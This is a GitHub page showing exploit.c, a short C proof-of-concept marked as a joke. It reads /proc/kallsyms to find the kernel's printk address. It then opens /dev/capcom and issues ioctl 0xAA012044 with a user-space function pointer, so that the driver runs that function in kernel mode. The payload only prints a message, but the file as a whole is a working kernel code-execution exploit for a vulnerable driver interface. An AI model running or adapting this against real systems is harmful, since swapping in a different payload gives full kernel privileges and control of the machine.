-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.c
50 lines (41 loc) · 898 Bytes
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*
* DISCLAIMER: This is a joke. Do not use this on a system you care about.
*/
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
static void (*printk)(const char*);
static void run_in_kernel(void) {
printk("this ran in kernel mode\n");
}
int main(void) {
FILE *kallsyms = fopen("/proc/kallsyms", "r");
if (!kallsyms) {
perror("fopen /proc/kallsyms");
return 1;
}
long address;
char type[4];
char symbol[256];
while (fscanf(kallsyms, "%lx %3s %255s", &address, type, symbol) == 3) {
if (strcmp("printk", symbol) == 0) {
printk = (void*) address;
break;
}
}
if (!printk) {
fprintf(stderr, "printk was never found\n");
return 1;
}
int fd = open("/dev/capcom", O_RDONLY);
if (fd < 0) {
perror("open /dev/capcom");
return 1;
}
if (ioctl(fd, 0xAA012044, run_in_kernel) < 0) {
perror("ioctl");
return 1;
}
return 0;
}